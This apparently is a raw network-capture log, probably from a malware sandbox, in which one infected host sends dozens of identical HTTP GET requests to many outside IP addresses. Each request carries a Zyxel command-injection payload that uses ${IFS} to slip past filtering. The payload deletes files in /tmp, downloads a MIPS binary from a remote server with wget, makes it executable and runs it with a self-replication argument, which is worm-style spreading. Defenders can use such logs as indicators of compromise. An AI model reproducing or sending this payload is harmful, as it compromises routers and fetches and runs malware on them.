                                      Jan 14, 2024 15:50:54.487534046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6409192.168.2.1447390161.189.175.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.487567902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6410192.168.2.1439210221.188.165.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.487617016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6411192.168.2.143578883.132.204.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.487660885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6412192.168.2.144417884.37.69.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.487723112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6413192.168.2.1453866178.20.225.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.487749100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6414192.168.2.1460848107.18.96.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.487782001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6415192.168.2.1436768164.44.50.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.487821102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6416192.168.2.144104820.47.19.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.487873077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6417192.168.2.144418675.53.47.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.487899065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6418192.168.2.1440738195.242.158.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.487934113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6419192.168.2.145216670.248.42.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.487979889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6420192.168.2.144946238.29.87.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.488032103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6421192.168.2.1458124108.127.82.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.488069057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6422192.168.2.144455695.153.236.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.488120079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6423192.168.2.1445194193.114.112.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.488138914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6424192.168.2.1457614129.190.101.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.488179922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6425192.168.2.144376463.163.103.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.488238096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6426192.168.2.1451618144.92.83.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.488295078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6427192.168.2.144688031.188.57.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.488331079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6428192.168.2.1457846162.213.188.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.488385916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6429192.168.2.145419242.206.2.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.488431931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6430192.168.2.1438202105.95.255.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.488471031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6431192.168.2.1439930185.182.19.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.488533974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6432192.168.2.144689289.14.31.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.488563061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6433192.168.2.1447704191.52.127.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.488612890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6434192.168.2.1436928213.56.75.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.488647938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6435192.168.2.1445720220.74.236.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.488679886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6436192.168.2.1448304115.29.249.238443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.488711119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6437192.168.2.145808885.46.65.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.488754034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6438192.168.2.1437136184.43.236.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.488781929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6439192.168.2.1445814135.50.110.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.488867044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6440192.168.2.1443202156.227.210.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.488923073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6441192.168.2.143594225.176.161.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.488965988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6442192.168.2.143561477.37.84.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.489010096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6443192.168.2.1442764197.141.127.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.489032030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6444192.168.2.145551281.181.29.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.489064932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6445192.168.2.145704060.77.209.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.489103079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6446192.168.2.1449118145.216.192.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.489151955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6447192.168.2.1451872184.98.68.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.489195108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6448192.168.2.14402684.174.202.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.489258051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6449192.168.2.145724469.54.24.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.489293098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6450192.168.2.1434464140.34.13.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.489325047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6451192.168.2.145183023.140.254.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.489352942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6452192.168.2.1451174103.45.141.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.489391088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6453192.168.2.145406699.116.169.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.489444971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6454192.168.2.1448970209.104.122.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.489480019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6455192.168.2.145318885.49.41.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.489517927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6456192.168.2.143881061.2.60.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.489552975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6457192.168.2.1446650163.89.231.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.489610910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6458192.168.2.1453648132.83.223.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.489648104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6459192.168.2.143696461.248.117.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.489679098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6460192.168.2.1454504151.147.219.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.489720106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6461192.168.2.1450198171.63.114.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.489764929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6462192.168.2.144522694.184.23.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.489831924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6463192.168.2.1434896163.77.75.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.489837885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6464192.168.2.145389862.219.227.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.489897013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6465192.168.2.1440552172.44.189.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.489933014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6466192.168.2.1441206205.182.205.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.489967108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6467192.168.2.1436050181.91.54.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.490020990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6468192.168.2.145472614.100.21.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.490060091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6469192.168.2.144878041.27.229.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.490125895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6470192.168.2.144461054.115.51.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.490139008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6471192.168.2.144498278.246.33.247443
                                      TimestampBytes transferredDirectionData
